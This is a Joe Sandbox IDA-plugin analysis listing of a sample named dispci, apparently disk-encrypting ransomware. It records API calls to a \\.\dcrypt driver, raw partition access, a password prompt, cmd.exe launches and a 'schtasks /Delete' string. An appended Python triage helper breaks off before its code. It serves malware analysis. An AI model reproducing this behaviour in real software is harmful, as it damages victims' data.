                                                                        • Part of subcall function 00DF57B0: _vswprintf_s.LIBCMT ref: 00DF57DB
                                                                        • Part of subcall function 00DF5810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00DF585A
                                                                        • Part of subcall function 00DF5810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00DF5870
                                                                        • Part of subcall function 00DF5810: lstrcatW.KERNEL32(?,\cmd.exe,?,?), ref: 00DF5886
                                                                        • Part of subcall function 00DF5810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00DF58EE
                                                                      • WaitForSingleObject.KERNEL32(?,00007530), ref: 00DF5ACE
                                                                      • WaitForSingleObject.KERNEL32(?,00007530), ref: 00DF5B2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Time$System$DirectoryFileObjectSingleWait$AppendCreateEnvironmentLocalPathProcessVariable_vswprintf_slstrcat
                                                                      • String ID: %ws_%u$schtasks /Delete /F /TN %ws$viserion
                                                                      • API String ID: 1242734776-1187404337
                                                                      • Opcode ID: ab1df73ed8cb2ab047fc9f59e77ea2434581365db9684458ef7743e5a29543a2
                                                                      • Instruction ID: 00f5aa45b72f117602b550cf46b092976c95cb21243054ac3818e401c78fbc06
                                                                      • Opcode Fuzzy Hash: ab1df73ed8cb2ab047fc9f59e77ea2434581365db9684458ef7743e5a29543a2
                                                                      • Instruction Fuzzy Hash: 4721A5A1750B086BD210B620AC87EBB7B55DB80754F418438B748672D5E975BD4C8AF1
                                                                      APIs
                                                                        • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
                                                                        • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                        • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
                                                                      • _malloc.LIBCMT ref: 00DF33C1
                                                                      • CloseHandle.KERNEL32 ref: 00DF350F
                                                                      • _free.LIBCMT ref: 00DF3516
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                                                      • String ID:
                                                                      • API String ID: 496446412-0
                                                                      • Opcode ID: c5340970e5c30d84efbc9a6455093bd934b89ff8c6e96c10969c9ee13f07320a
                                                                      • Instruction ID: 925f0697c47779524f78b330ec7d475429ae08971f8d1548ada39f28ae91cd3d
                                                                      • Opcode Fuzzy Hash: c5340970e5c30d84efbc9a6455093bd934b89ff8c6e96c10969c9ee13f07320a
                                                                      • Instruction Fuzzy Hash: 854181B2D0021C5BDB21DA548C81BFA7378EB84310F1BC1B9EB0967241D675AF858BF5
                                                                      APIs
                                                                        • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
                                                                        • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                        • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
                                                                      • DeviceIoControl.KERNEL32(?,000700A0,00000000,00000000,?,00000028,?,00000000), ref: 00DF269B
                                                                      • __aulldiv.LIBCMT ref: 00DF26E5
                                                                      • __aulldiv.LIBCMT ref: 00DF2702
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000,?,00000000,?,000700A0,00000000), ref: 00DF27D2
                                                                      • _free.LIBCMT ref: 00DF27D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldiv_free$CloseControlCreateDeviceFileHandle__snwprintf_malloc
                                                                      • String ID:
                                                                      • API String ID: 1280953716-0
                                                                      • Opcode ID: e26c9259746c38489aebb399acb16da17f4b2dad1254a43dcc97a9e5e038a7d1
                                                                      • Instruction ID: d996f35e010c2fee0ffdeb2d8ffea104814ce6b38223217b0214b5d9855c7fd2
                                                                      • Opcode Fuzzy Hash: e26c9259746c38489aebb399acb16da17f4b2dad1254a43dcc97a9e5e038a7d1
                                                                      • Instruction Fuzzy Hash: 3E4146B5D011185FDB24DB25CC89BBBB3B9EB84710F1581D5B909A7240D774AE80CF70
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00DF539B
                                                                        • Part of subcall function 00DF2020: TlsGetValue.KERNEL32(?), ref: 00DF202B
                                                                        • Part of subcall function 00DF2020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • VirtualLock.KERNEL32(?,00000104), ref: 00DF53D9
                                                                        • Part of subcall function 00DF2340: VirtualAlloc.KERNEL32(00000000,00000298,00003000,00000040), ref: 00DF235D
                                                                        • Part of subcall function 00DF2340: TlsGetValue.KERNEL32(?), ref: 00DF2370
                                                                        • Part of subcall function 00DF2340: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2388
                                                                        • Part of subcall function 00DF2340: TlsSetValue.KERNEL32(?,00000000), ref: 00DF239D
                                                                        • Part of subcall function 00DF2340: DeviceIoControl.KERNEL32(00000000,00220060,?,00000008,00000000,00000000,?,00000000), ref: 00DF23B9
                                                                        • Part of subcall function 00DF2340: GetLastError.KERNEL32 ref: 00DF23C3
                                                                        • Part of subcall function 00DF2340: VirtualLock.KERNEL32(?,00000298), ref: 00DF23D6
                                                                        • Part of subcall function 00DF3820: TlsGetValue.KERNEL32(?,00000001,?,?,?,?,00DF2463,?), ref: 00DF382D
                                                                        • Part of subcall function 00DF3820: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00DF2463,?), ref: 00DF3845
                                                                        • Part of subcall function 00DF3820: TlsSetValue.KERNEL32(?,00000000,?,?,?,?,00DF2463,?), ref: 00DF385A
                                                                        • Part of subcall function 00DF3820: DeviceIoControl.KERNEL32(00000000,00220064,?,00000004,00000000,00000000,?,00000000), ref: 00DF3876
                                                                        • Part of subcall function 00DF3820: GetLastError.KERNEL32(?,?,?,?,00DF2463,?), ref: 00DF3880
                                                                        • Part of subcall function 00DF3820: VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,00DF2463,?), ref: 00DF3894
                                                                        • Part of subcall function 00DF3820: VirtualUnlock.KERNEL32(?,?,?,?,?,?,00DF2463,?), ref: 00DF38C2
                                                                        • Part of subcall function 00DF3820: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00DF2463,?), ref: 00DF38D3
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000104,?,00000080), ref: 00DF5417
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000410,00E0A5B0,00000410,00000000,00000000), ref: 00DF5474
                                                                      • LocalFree.KERNEL32(?), ref: 00DF54E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Value$CreateFile$AllocByteCharControlDeviceErrorFreeLastLockMultiWide$LocalQueryUnlock
                                                                      • String ID:
                                                                      • API String ID: 1566722532-0
                                                                      • Opcode ID: f9e86dfea145f697066e57dd36f804535c308e92b5c3aab1bdcd492096093790
                                                                      • Instruction ID: eff70bc67fd79c8a8d9bbdd741a9cd6b2ca6327b24e089687fb086af2b5701ff
                                                                      • Opcode Fuzzy Hash: f9e86dfea145f697066e57dd36f804535c308e92b5c3aab1bdcd492096093790
                                                                      • Instruction Fuzzy Hash: 5441C8B5A0021C6BD72097659C46FFA7378DF44705F058094FB45AA1C5EAB1AEC48BB4
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00DF4D04
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D0B
                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 00DF4D2B
                                                                      • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00DF4D82
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D89
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDeviceValue$ObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 4079559193-0
                                                                      • Opcode ID: 36e3cab02d1fd16874100267818dc8b44083ce281e561428b3e3fffe455d9c85
                                                                      • Instruction ID: 9aa4a24dc821c9b98cbd5928b4446ee50f8e73f2e98585b28431397bcfc80047
                                                                      • Opcode Fuzzy Hash: 36e3cab02d1fd16874100267818dc8b44083ce281e561428b3e3fffe455d9c85
                                                                      • Instruction Fuzzy Hash: 6431A3713043086FE2209BA9DC4ABBB77A9EB89B00F058919F645EB291DA70D904C7B5
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00DF4D04
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D0B
                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 00DF4D2B
                                                                      • TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00DF4D82
                                                                      • DeviceIoControl.KERNEL32(00000000), ref: 00DF4D89
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ControlDeviceValue$ObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 4079559193-0
                                                                      • Opcode ID: d34b11627e76246bbeecc15c5c9bc06913137a331f4554b2e751616efe63c24f
                                                                      • Instruction ID: 45143cf75a2690a4ea6313403737ab3baff650f6765b11b3bf5aec4f322ce86c
                                                                      • Opcode Fuzzy Hash: d34b11627e76246bbeecc15c5c9bc06913137a331f4554b2e751616efe63c24f
                                                                      • Instruction Fuzzy Hash: C52180312043049FE324DBA5DC4ABBB77A8EB89B00F098908F645EA191DA70D944C771
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00DFDDC6
                                                                        • Part of subcall function 00DF5E86: __FF_MSGBANNER.LIBCMT ref: 00DF5E9F
                                                                        • Part of subcall function 00DF5E86: __NMSG_WRITE.LIBCMT ref: 00DF5EA6
                                                                        • Part of subcall function 00DF5E86: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00DFB13B,?,00000001,?,?,00DF9441,00000018,00E05D10,0000000C,00DF94D1), ref: 00DF5ECB
                                                                      • _free.LIBCMT ref: 00DFDDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: AllocHeap_free_malloc
                                                                      • String ID:
                                                                      • API String ID: 2734353464-0
                                                                      • Opcode ID: 21b4f07e2af34b2d7c1b13ae587447620623696b4df50ca83cbdd49812ef2975
                                                                      • Instruction ID: cc552b0a1e88f8b5a96b31c8d0fe2f6c91dd1d011e6231e6a067fef51ff47620
                                                                      • Opcode Fuzzy Hash: 21b4f07e2af34b2d7c1b13ae587447620623696b4df50ca83cbdd49812ef2975
                                                                      • Instruction Fuzzy Hash: 9D11E73240571DAFCB313F75AC046BA3A97DB553A0F27C525FB88AA150DB35CA80D6B0
                                                                      APIs
                                                                      • __getptd.LIBCMT ref: 00DF9E99
                                                                        • Part of subcall function 00DFA0B6: __getptd_noexit.LIBCMT ref: 00DFA0B9
                                                                        • Part of subcall function 00DFA0B6: __amsg_exit.LIBCMT ref: 00DFA0C6
                                                                      • __getptd.LIBCMT ref: 00DF9EB0
                                                                      • __amsg_exit.LIBCMT ref: 00DF9EBE
                                                                      • __lock.LIBCMT ref: 00DF9ECE
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00DF9EE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                      • String ID:
                                                                      • API String ID: 938513278-0
                                                                      • Opcode ID: d769e2ad8f7476aea708113cd9e1b7b09efb40e8bd225d88c2b86de20c2c6229
                                                                      • Instruction ID: 67c3d99cca99aad6e03c873e5074e8dea9604c16585eb1f32332a304f694e9d3
                                                                      • Opcode Fuzzy Hash: d769e2ad8f7476aea708113cd9e1b7b09efb40e8bd225d88c2b86de20c2c6229
                                                                      • Instruction Fuzzy Hash: F1F06232D45A089AD721FB68550676AA3A0EF00724F17C10AF789A72C2DF744941CA76
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00DF50CC
                                                                        • Part of subcall function 00DF2020: TlsGetValue.KERNEL32(?), ref: 00DF202B
                                                                        • Part of subcall function 00DF2020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
                                                                      • VirtualLock.KERNEL32(?,00000104), ref: 00DF50FD
                                                                      • _wprintf.LIBCMT ref: 00DF511B
                                                                       Strings
                                                                       • Enter password#1:
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$AllocCreateFileLockValue_wprintf
                                                                      • String ID: Enter password#1:
                                                                      • API String ID: 1727537069-3500599354
                                                                      • Opcode ID: 7c6c26825add5f3061ed5121423c516570f6de7b56e1f29135a9d290cdb0ff63
                                                                      • Instruction ID: 2ddc9762d53a211ff4fe7beb0487e005c9359bf3f90965d3ff5a825a574e72f4
                                                                      • Opcode Fuzzy Hash: 7c6c26825add5f3061ed5121423c516570f6de7b56e1f29135a9d290cdb0ff63
                                                                      • Instruction Fuzzy Hash: 6201D8B1F4171C77EA20B6A46C03BBF76589B00B14F058155FF05762C1DAB1968482F2
                                                                      APIs
                                                                        • Part of subcall function 00DF39E0: __snwprintf.LIBCMT ref: 00DF3A0A
                                                                        • Part of subcall function 00DF39E0: _malloc.LIBCMT ref: 00DF3A11
                                                                        • Part of subcall function 00DF39E0: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000,00000000), ref: 00DF3A39
                                                                        • Part of subcall function 00DF39E0: _free.LIBCMT ref: 00DF3AD6
                                                                      • _malloc.LIBCMT ref: 00DF3191
                                                                      • CloseHandle.KERNEL32 ref: 00DF329D
                                                                      • _free.LIBCMT ref: 00DF32A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _free_malloc$CloseCreateFileHandle__snwprintf
                                                                      • String ID:
                                                                      • API String ID: 496446412-0
                                                                      • Opcode ID: 5e759ba747b7e96e48c26b23fef2c23585da2cf6e56471f70f3bb7104aaa6cff
                                                                      • Instruction ID: b078f88b318fe39f5ff57cc6400a8461e562d2b048cb1202be832dafe3c64b5d
                                                                      • Opcode Fuzzy Hash: 5e759ba747b7e96e48c26b23fef2c23585da2cf6e56471f70f3bb7104aaa6cff
                                                                      • Instruction Fuzzy Hash: 2E41A7B190021C9BDB21DB54CC85AFE7379EB84350F1B81E9EE095B201DA359F858BB1
                                                                      APIs
                                                                        • Part of subcall function 00DF35D0: _memset.LIBCMT ref: 00DF35FA
                                                                        • Part of subcall function 00DF35D0: CreateFileW.KERNEL32(\\.\GLOBALROOT\ArcName\multi(0)disk(0)rdisk(0)partition(1),80100000,00000003,00000000,00000003,00000000,00000000,?,?,00DF2DD3), ref: 00DF3616
                                                                      • _malloc.LIBCMT ref: 00DF305B
                                                                      • _free.LIBCMT ref: 00DF30DE
                                                                      • CloseHandle.KERNEL32 ref: 00DF30EF
                                                                      • _free.LIBCMT ref: 00DF30F6
                                                                        • Part of subcall function 00DF3AF0: __aullrem.LIBCMT ref: 00DF3B0A
                                                                        • Part of subcall function 00DF3AF0: _memmove.LIBCMT ref: 00DF3BBC
                                                                        • Part of subcall function 00DF3AF0: _free.LIBCMT ref: 00DF3BC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CloseCreateFileHandle__aullrem_malloc_memmove_memset
                                                                      • String ID:
                                                                      • API String ID: 3971761140-0
                                                                      • Opcode ID: 31a25d4f6f1d2d8d8059145968c29330c1dacd36e49189288c4571b962cef46b
                                                                      • Instruction ID: fbc7de45678504c240412b021af2b5804b71bcd31dcb5a8d35a952d8d8a9ca52
                                                                      • Opcode Fuzzy Hash: 31a25d4f6f1d2d8d8059145968c29330c1dacd36e49189288c4571b962cef46b
                                                                      • Instruction Fuzzy Hash: CF31D876A0011C9BDB20AA54DC415FEB3B8EF44360F0B81AAFE1997241DA35DF948BB1
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DFA6C2
                                                                      • __isleadbyte_l.LIBCMT ref: 00DFA6F5
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00DFA726
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000), ref: 00DFA794
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 17289a3b3e5c865faab26b9f4300b8673cb7e2debec1c3f39638124b1b1dc523
                                                                      • Instruction ID: 3dc5c99ed9fa78c637e5fca1a21ec100ff06714ee68cdcc44f79062141d0693e
                                                                      • Opcode Fuzzy Hash: 17289a3b3e5c865faab26b9f4300b8673cb7e2debec1c3f39638124b1b1dc523
                                                                      • Instruction Fuzzy Hash: 8731B1B1601249EFDB20EF68C880DBA3BB5AF01350B1EC569E66DDB191D730DD40DB62
                                                                      APIs
                                                                      • FindFirstVolumeW.KERNEL32(?,00000104), ref: 00DF4802
                                                                        • Part of subcall function 00DF20A0: TlsGetValue.KERNEL32(?), ref: 00DF20BD
                                                                        • Part of subcall function 00DF20A0: _wcschr.LIBCMT ref: 00DF20C8
                                                                        • Part of subcall function 00DF20A0: _wcschr.LIBCMT ref: 00DF20F8
                                                                        • Part of subcall function 00DF20A0: __snwprintf.LIBCMT ref: 00DF210C
                                                                        • Part of subcall function 00DF20A0: DeviceIoControl.KERNEL32(00000000,00220040,?,00000298,?,00000298,?,00000000), ref: 00DF213D
                                                                        • Part of subcall function 00DF20A0: DeviceIoControl.KERNEL32(00000000,0022001C,?,00000298,?,0000022C,?,00000000), ref: 00DF2196
                                                                      • FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00DF4889
                                                                      • GetLastError.KERNEL32 ref: 00DF488B
                                                                        • Part of subcall function 00DF22B0: FindNextVolumeW.KERNEL32(?,?,00000104), ref: 00DF22D6
                                                                        • Part of subcall function 00DF22B0: GetLastError.KERNEL32(?,?,00000104), ref: 00DF22DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                       • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmp
                                                                       • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: FindVolume$ControlDeviceErrorLastNext_wcschr$FirstValue__snwprintf
                                                                      • String ID:
                                                                      • API String ID: 940178688-0
                                                                      • Opcode ID: 031aea96f773aa63d61813f34636029e81424802d31b5f2688458a25d6f662b2
                                                                      • Instruction ID: 69e0788984f7db04f2b03f880d78baa47e706809417c5316a4a76d99ade7ccd8
                                                                      • Opcode Fuzzy Hash: 031aea96f773aa63d61813f34636029e81424802d31b5f2688458a25d6f662b2
                                                                      • Instruction Fuzzy Hash: A921CC71A0020C8FDB10EB31DC456BF7775FB84311F4685A9E61AA7180DE319E48CFA0
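Added example (not part of the Joe Sandbox report or of the analysed sample): a Python triage helper that parses the API bullet lines in the function records above and decodes the control codes passed to DeviceIoControl using the Windows CTL_CODE field layout (device type, access, function, method). The embedded SAMPLE is an excerpt copied from the bullets on this page. Two things are my assumptions rather than anything the report states: the heuristic of scanning neighbouring calls' arguments for control codes, because the report attributes stack slots to the nearest call (the eight-argument list shown on the TlsGetValue line above, with 0022003C in the second slot, very likely belongs to the DeviceIoControl that follows it), and the choice of FILE_DEVICE_UNKNOWN (0x22) and FILE_DEVICE_DISK (0x07) as the device types worth flagging in a sample that opens `\\.\dcrypt` and the raw first partition.

```python
"""Added triage helper for Joe Sandbox function-record listings (not part of the report)."""
import re
from collections import namedtuple

# Constructed excerpt: API bullets copied from the function records on this page.
SAMPLE = r"""
APIs
• TlsGetValue.KERNEL32(?,0022003C,?,00000298,?,00000298,?,00000000), ref: 00DF4D04
• DeviceIoControl.KERNEL32(00000000), ref: 00DF4D0B
• TlsGetValue.KERNEL32(?,00220034,?,00000298,?,00000298,?,00000000), ref: 00DF4D82
• DeviceIoControl.KERNEL32(00000000), ref: 00DF4D89
APIs
• VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000040), ref: 00DF50CC
  • Part of subcall function 00DF2020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00DF2043
• VirtualLock.KERNEL32(?,00000104), ref: 00DF50FD
APIs
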